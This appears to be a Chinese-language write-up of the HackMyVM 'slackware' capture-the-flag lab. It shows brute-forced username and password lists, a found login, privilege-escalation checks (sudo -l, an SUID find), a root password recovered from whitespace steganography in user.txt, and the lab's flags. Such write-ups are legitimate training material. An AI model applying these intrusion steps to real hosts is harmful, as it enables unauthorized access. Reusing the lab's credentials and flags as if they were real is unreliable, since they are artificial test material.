# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee', 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft', 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer', 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos', 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt', 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc', '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t', 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg', '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj', 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh', 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw', 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']
# [+] Search user flag (っ^_^)っ
# [+] USER:rpj7 PASS:wP26CtkDby6J => ./user.txt:1:HMV{Th1s1s1Us3rFlag}

获取到flag位置,现在登录rpj7

提权

在http服务中我们已经获取到了user_flag,现在开始进行提权

sudo -l

sudo -l 发现需要登录密码。看来不行

find / -perm -u=s -type f 2>/dev/null

这个也不能提权

txt隐写

通过大佬的提示,发现user.txt存在隐写(这个是真不知道0.0,以后长记性了)

首先把user.txt下载到kali中 (因为靶机没工具)

1
2
3
4
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# scp -P 1 rpj7@192.168.56.16:~/user.txt user.txt
(rpj7@192.168.56.16) Password: 
user.txt

使用stegsnow 查看文件隐写

获取一个字符串,尝试登录root

成功登录,查看root.txt

说是不在这,在home目录?

1
2
3
root@slackware:/home# grep -ri 'root'
rpj7/.bash_history:su root
0xh3rshel/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}

找到了

使用grep 查找home目录及其子目录下包含root的文件

-r 为递归查找
-i 忽略大小写

当然我们也可以直接查flag头

grep -ri ‘HMV’

cx的渗透日记
#渗透
HackMyVM-slackware
http://example.com/2024/11/12/HackMyVM-slackware/
作者
butt3rf1y
发布于
2024年11月12日
许可协议